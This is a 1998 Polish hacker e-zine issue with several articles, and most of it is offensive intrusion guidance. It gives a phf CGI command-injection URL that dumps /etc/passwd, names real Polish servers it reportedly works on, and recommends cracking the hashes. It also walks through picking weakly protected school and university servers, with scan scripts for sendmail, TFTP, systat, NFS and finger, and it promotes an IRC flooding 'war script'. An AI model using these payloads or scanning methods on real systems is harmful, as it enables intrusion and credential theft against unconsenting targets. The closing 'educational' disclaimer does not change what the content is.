| | ---- ---- | / |--- |---\ /---\ |\ /| /--\ /----- | | | | | | | / | | | | | \ / | / \ | |----| |----| | |\ |-- |---/ \---\ | \/ | |----| | --\ | | | | | | | \ | | \ | | | | | | | | | | | ---- | \ |--- | \ \---/ | | | | \----/ ============================================================================= Numer:03 z czerwca 1998 http://www.kki.net.pl/hackers ============================================================================= Spis tresci: 1.Spis tresci 2.Wstep 3.Hacker Start 4.Zdobywanie wielu kont. 5.Skrypt! 6.Unix - polecenia cz.2 7.Linki do ciekawych stron 8.Redakcja ----------------------------------------------------------------------------- Wstep: Cos jakos tak ten mag wychodzi co 2 miesiace, choc powinien co miesiac. Do tego numeru dolacze program opisywany w poprzednim numerze - "Kaboom!" . Cos sie z nasza strona www dzieje, moze nawet za pol roku bedzie mozna uznac ja za skonczona :) . W tym numerze bedzie duzo o UNIX-ie. Kontakt przez email: hackers@kki.net.pl Richgyver ps. Napiszcie czy wolicie wersje tekstowa czy html-owska wersje maga! ----------------------------------------------------------------------------- "Hacker Start": Opisze tutaj dosc znany sposob wyciagniecia pliku passwd z katalogu etc w systemach UNIX przez przegladarke internetowa z serverow podlaczonych do internetu. Znajdujemy jakis serwer (komputer podlaczony bezposrednio do internetu) a nastepnie wpisujemy w pole adresu: http://xxxx.xxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ^^^^^^^^^^^^^ tu adres servera W tedy w przegladarce pojawi nam sie caly plik passwd, gdzie sa zapisane hasla wszystkich uzytkownikow danego systemu. Oczywiscie sa one zaszyfrowane. Rozszyfrowac je mozna programikiem o nazwie "Cracker Jack". Ta metoda dziala juz na bardzo niewielu serwerach unixowych. W polsce ta metoda dziala na: http://www.radio.opole.com.pl http://www.perytnet.pl Richgyver ----------------------------------------------------------------------------- ZDOBYWANIE WIELU KONT: czesc 1: Tworzenie listy serwerow i wstepne zbieranie informacji... Zaczne od tego, ze pisze ten artykul tylko po to, aby inni uzytkownicy wiedzieli, ze mozliwe jest latwe zdobycie ich konta UNIXowego. ============================================================================= OK., jest to pierwsza czesc mojego artykulu na temat hackowania kont UNIXowych, wiec chcialbym napisac co wogole bedzie mozna tu znalezc. Wiec tak, zamierzam opisac metody zdobywania adresow serwerow i wyszukiwania tych slabo zabezpieczonych, dalej metody chodzenia wokol systemu, zdobywania informacji o jego slabych punktach, ktore mozna wykorzystac do wlamania. Nastepnie kilka metod dostania sie do takiego serwera. Czytanie pliku /etc/shadow z poziomu "szarego" uzytkownika, zdobywanie dalszych kont po wlamaniu sie na serwer ( konie trojanskie, poszukiwanie bledow w konfiguracji, itp. ). Moze bedzie cos jeszcze ( jesli mnie natchnie, lub znajde cos ciekawego w sieci :) ============================================================================ To zaczynam: Najlatwiejszym sposobem wlamania sie do systemu jest wyszukanie sobie kilku najslabiej zabezpieczonych serwerow i testowanie roznych metod wlasnie na nich. Jest to tez chyba najbezpieczniejsze, gdyz zakladam, ze skoro serwer jest slabo zabezpieczony, to jest rowniez slabo monitorowany, co daje nam rowniez wieksze bezpieczenstwo. Jak wyszukac sobie takie serwery? Otoz jest to bardzo proste. Podam tu dwie najprostsze chyba metody: 1. Uruchamiamy wyszukiwarke internetowa ( np. www.wow.pl ), wybieramy interesujacy nas dzial serwerow ( polecam edukacja/ szkoly, uczelnie, organizacje studenckie i tym podobny shit :) Gdy pojawi sie spis serwerow zapisujemy go na dysk. Kiedys wszystkie dzialy WOWa byly na plytce WWW ( np. "WWW" sierpien 1997, mozna wiec zrobic to off-line oszczedzajac kase ). Dalej wycinamy adresy serwerow ( recznie lub przy uzyciu jakiegos programiku np. UrlCut, ktory dolaczam [ jest to wersja 0.01 napisana w 15 min., wiec posiada duzo bledow, ale obiecuje je wkrotce poprawic ] ). Majac juz liste serwerow ( jeden pod drugim ) mozemy rozpoczac scanning... 2. Druga metoda to sciagniecie gotowej listy serwerow z: ftp.rs.internic.net ( sa tam: com.zone.gz, edu.zone.gz, gov.zone.gz, org.zone.gz, root.zone.gz i inne ). Polecam edu lub org, jako najslabiej zabezpieczone. Odradzam natomiast "zabawe" z gov.zone.gz ( szczegolnie poczatkujacym hackerom ). Po zrzuceniu pliki te nalezy rozpakowac ( $ gzip -d edu.zone.gz lub pod WIN95 WinZip 6.3 [ moze inne tez] ). Dalej znow trzeba recznie odzielic adresy od reszty danych ( mozna uzyc programiku getdomain napisanego w perlu [ uruchamiamy go: $ perl getdomain.pl edu.zone edu>lista ,lub dla org $ perl getdomain.pl org.zone org>lista i analogicznie inne ]). W najblizszym czasie postaram sie napisac podobne narzedzie pod DOSa. 3. Mozna tez wykorzystac liste serwerow, ktora dodaje do artykulow jest ona uzyskana wlasnie z WOW i obrobiona programikiem UrlCut. Dobra mamy juz liste serwerow. Teraz nalezaloby oddzielic ziarna od plew. Zaczynamy od wstepnego przejrzenia podstawowych dziur... W tej czesci podam jedynie jak zdobywac rozne dane, w czesci nastepnej postaram sie przedstawic wam ich analize i doczego moga nam sie przydac zdobyte informacje. a) SENDMAIL: Zacznijmy moze od sprawdzenia wersji sendmaila na serwerze. $ telnet adres.serwera.ofiary 25 powinno pojawic sie cos takiego: ...adres.serwera.edu.pl Sendmail 8.6.12/8.6.12 ready at... Aby zrobic to automatycznie mozna uzyc programu SMSCAN, uruchamiajac go ze stworzona wczesniej lista serwerow ( najpierw kompilujemy i zamieniamy nazwe :) $ gcc smscan.c $ mv a.out SMSCAN i uruchamiamy: $ ./SMSCAN lista>plik.z.wersjami.sendmaili& Trwa to dosc dlugo, wiec najlepiej robic to albo noca, albo polaczyc sie z jakims serwerem udostepniajacym konta UNIXowe zrzucic tam SMSCAN i liste serwerow do sprawdzenia a po uruchomieniu ( zostawic proces w tle& lub nohup ) i wylogowac sie. Wyniki mozna obejrzec wtedy np. nastepnego dnia. Spisujemy numery wersji Sendmail'i ( potem nam sie przydadza ). b) TFTP ( Trivial File Transfer Protocol ). Sprawdzamy, czy serwery maja zaistalowanego klienta tftp: $ telnet adres.serwera.ofiary 69 Jesli sie polaczy - notujemy to sobie, jesli nie - szukamy dalej. Dzis juz bardzo trudno znalezc serwer odpowiadajacy na takie zawolanie. Najczesciej zobaczycie napis: telnet: Unable to connect to remote host: Connection refused Mozna tez napisac script, ktory bedzie to robil za nas. W najprostszej formie wygladalby tak: $ cat script.tftp telnet www.adres1.edu.pl 69 telnet www.adres2.edu.pl 69 telnet www.adres3.edu.pl 69 Tak robilem na poczatku, gdy jeszcze nie umialem napisac bardziej skomplikowanego, lecz uniwersalnego scriptu. Teraz wyglada on w ten sposob: $ cat script.tftp #!/bin/sh for serwer in `cat $1` do telnet $serwer 69 done $ :) Uruchamiamy: $ ./script.tftp lista.serwerow>raport.tftp Przegladajac 'raport.tftp' wyszukujemy z jakimi serwerami polaczenie sie powiodlo. Notujemy to sobie. c) SYSTAT i NETSTAT. Wykonujemy te same czynnosci, co powyzej, lecz zamiast portu 69 odpowiadajacego za TFTP podajemy 11 (systat) a nastepnie 15 (netstat). Sprawdzamy czy otrzymujemy odpowiedz z serwera ( czy porty te sa aktywne ). Jesli tak: $ telnet www.adres.serwera 11>raport.systat& Powinienes otrzymac liste procesow na serwerze ( tak jakbys wydal komende ps -auwwx ), nie majac nawet na nim konta. $ telnet www.adres.serwera 15>raport.netstat& Zwroci Ci liste aktywnych portow serwera. d) NFS, czyli Network File System. Jest to chyba najfajniejsza rzecz jaka wymyslono. Admini ciagle maja problemy z konfiguracja pliku /etc/exports. Tworzymy wiec podobny script, z tym, ze zamiast telnetu wpisujemy " showmount -e ". ----- wytnij tu ------ #!/bin/sh for serwer in `cat $1` do showmount -e $serwer done ----- wytnij tu ------ Na wiekszosci systemow potrzeba do tego roota. # script.mount lista.serwerow>raport.mount& Jednak juz w Red Hat Linux 5.00 moze to zrobic kazdy uzytkownik ( a taki system jest wlasnie na dom.vr.pl, gdzie mozna sobie zalozyc darmowe konto ). % script.mount lista.serwerow>raport.mount& ;) e) FINGER. Jest to rowniez bardzo pozyteczne narzedzie. Szczegolnie w wydaniu: $ finger -l @www.adres.serwera Zwroci nam to dane na temat pracujacych w systemie uzytkownikow. Przydatne jest to szczegolnie przy probie dostania sie do systemu poprzez odgadniecie hasla. Znow tworzymy script, aby miec te informacje uwiecznione ( do pozniejszej analizy ). f) WWWBOARD. O wwwboard bedzie wlasciwie pozniej, ale warto jest sie zorientowac, czy serwer udostepnia takie uslugi ;) $ lynx Teraz naciskamy liere "g" i wpisujemy adres serwera: URL to open: http://www.adres.serwera/wwwboard/wwwboard.html Jesli odnajdzie szukana strone, notujemy. Nie - szukamy dalej. [ Na temat hackowania wwwboard'a napisze w kolejnych czesciach artykulu ] g) WS_FTP. Bardzo trudno jest dzis znalezc plik WS_FTP.INI z aktualnym wpisem, ale jesli Ci sie to uda to koniecznie zapisz to sobie. Jak go znalezc? Najlepiej polaczyc sie z serwerem za pomoca anonimowego ftp i szukac :) Gdy znajdziemy, to: ftp> get WS_FTP.INI [ Szerzej na temat WS_FTP napisze w dalszych czesciach artykulu ] h) Dziury w scriptach CGI-BIN w starszych HTTPD. Pod katem tego typu dziur mozna przeszukiwac serwery wykorzystujac program ( a raczej kilka scriptow ) XENOLITH i wczesniej stworzona liste. Do artykulu zalaczam script z tego pakietu o nazwie monk.sh Uzycie: $ ./monk.sh lista.serwerow Podczas skanowania tworzy on pliki o nazwie powstalej z adresu serwera, w ktorych zapisuje sciagniety plik z haslami ( pod warunkiem, ze go sciagnie, co dzis nie jest juz takie proste :( W celu przeskanowania pojedynczego serwera korzystam ze swietnego programiku o nazwie Vito. Dolacze go do nastepnego artykulu, w ktorym dokladniej opisze te dziury. ============================================================================= OK. tyle na dzisiaj. Wiecej w nastepnym numerze, w ktorym postaram sie wytlumaczyc wam w jaki sposob interpretowac zdobyte informacje, oraz jak z nich korzystac. ============================================================================= ArktH ps. Pozdrowienia dla: KeenU'a, Sir D, BoBo, 3stan'a i pozostalych. " Nil mortalibus ardui (e)st... " - Horacy mail: arkth@friko4.onet.pl flames: /dev/null ----------------------------------------------------------------------------- Skrypt!: Jak to mawiał kiedyś pan Japa WITKA (kto nie rozumie to nie zrozumie).W każdym bądź razie to znowu JA. Hmmm znowu kazali mi cos napisać ale nie powiedzieli co. Uwazam ze każdy z was ma mIRC-a (internet realy chat) ale jeśli nie to załączam go tutaj. Jego instalacja jest banalna wiec nie będę jej opisywal. Może nie raz będąc na ircu usłyszeliście cos o skryptach czy to wojennych obronnych czy może uniwersalnych. Właśnie to o nich chce powiedzieć co nieco. Niektórych stron możecie ściągnąć jakiegoś scrypta np. http://www.7thsphere.com/sphere/files/sphere.exe i jest on jednym z lepszych scryptow wojennych. Jest on w pliku zip lub wersji instalacyjnej. Po ściągnięciu rozpakujcie go do katalogu w którym macie zainstalowanego Mirca. Po włączeniu może pojawić się kłopot z setupem. Wpiszcie co tam chcą a jeśli będziecie mieli kłopocik to po prostu trzeba wcisnąć cancel. I właściwie to wszystko jeśli chodzi o instalacje. Po włączeniu musicie od początku wpisać swoje dane i kanał ircowy. Zaraz po połączeniu zobaczycie zmiany. Po pierwsze pojawiły się dźwięki. Wszystko wyświetlane jest w oknach. W pasku opcji pojawiła się nowa 7sphere. Jest tam wiele opcji m.in. można ustawić sobie ochronę różnego rodzaju np. przed floodem. Możemy zapisywać logi by potem sobie poczytać lub sprawdzić co kto mówił. Ważną opcją jest przejście do War Menu. Mamy wtedy dostęp do kilku programów do banowania, floodowania i różnych takich:):):):):)(r)Dużo opcji jest dostępnych dopiero gdy mamy opa (operator kanału). Lukas ----------------------------------------------------------------------------- Unix - polecenia czesc II : Zdobywanie informacji o innych użytkownikach: -Sprawdź co użytkownik robi - w "nazwa_użytkownika" -Sprawdź co użytkownik ostatnio robił - lastcomm "nazwa_uzytkownika" -Sprawdź porę zalogowania się/wylogowania - last "nazwa_użytkownika" -Wyświetlanie praw dostępu w katalogu macierzystym użytkownika - ls -ld ~"nazwa użytkownika" Prawa dostępu do plików i katalogów w UNIX: -Sprawdź prawa dostępu do pliku - ls -l nazwa_pliku -Sprawdź prawa dostępu do katalogu - ls -ld nazwa_pliku -Sprawdź prawa dostępu w swoim katalogu macierzystym - ls -ld ~"twoja_nazwa_użytkownika" Prawa dostępu (lewa część wykazu) będą podane następująco: -rxw-------- 2 aaron 512 Feb 17 08:14 nazwa_pliku gdzie symbole mają następujące znaczenie: d - katalog rwx (pierwsze) - prawa dostępu dla użytkownika (Ciebie) rwx (drugie) - prawa dostępu dla członków twojej grupy rwx (trzecie) - prawa dostępu dla innych (pozostałych) w każdej kategorii -użytkownik członkowie_grupy inni Symbol oznacza: R - zezwolenie na odczyt (kopiowanie, wyświetlanie, ściąganie) W - zezwolenie na zapis (zmiana nazwy, modyfikowanie, kasowanie) X - zezwolenie na uruchomienie pliku - - brak danego zezwolenia Prawa dostępu możesz zmienić poleceniem CHMOD. Trzeba w nim wskazać kategorię (u- użytkownik, g- członkowie grupy, o- inni,) oraz które zezwolenie (rwx) ma być włączone (+) lub wyłączone (-) Parametry mogą być kombinowane np. Chmod o-rw nazwa_uzytkownika - wyłączy zezwolenie na zapis i na odczyt dla innych Chmod u+x nazwa_uzytkownika - włączy zezwolenie na uruchamianie dla użytkownika Lukas ----------------------------------------------------------------------------- Linki do interesujacycg stron: -strony zwiazane z h/p/c/v/a -http://www.kki.net.pl/hackers -http://www.inet.com.pl/rafal -http://hack.netpol.pl -http://kki.net.pl/glider -http://www.kki.net.pl/~masher Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw: 1. Umiescic ten "kawalek" kodu html na swojej stronie: <-- Poczatek odnosnika do hackersmag --> <-- Koniec odnosnika --> 2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja o adresie twojej strony. Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym spisie najciekawszych stron. ----------------------------------------------------------------------------- W sklad redakcja tego maga wchodza: -Richgyver (hackers@kki.net.pl) -Lukas (chopin@friko.onet.pl) -ArtktH (arkth@friko4.onet.pl) Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo) lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie (pieniadze). Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu mozesz sciagnac ze strony: http://www.kki.net.pl/hackers Mozesz do nas napisac list, nasz email: hackers@kki.net.pl Wszystkie materialy i informacje zawarte sa tu jedynie w celach *EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za zle wykorzystanie podanych tu informacji... /Koniec pliku tekstowego./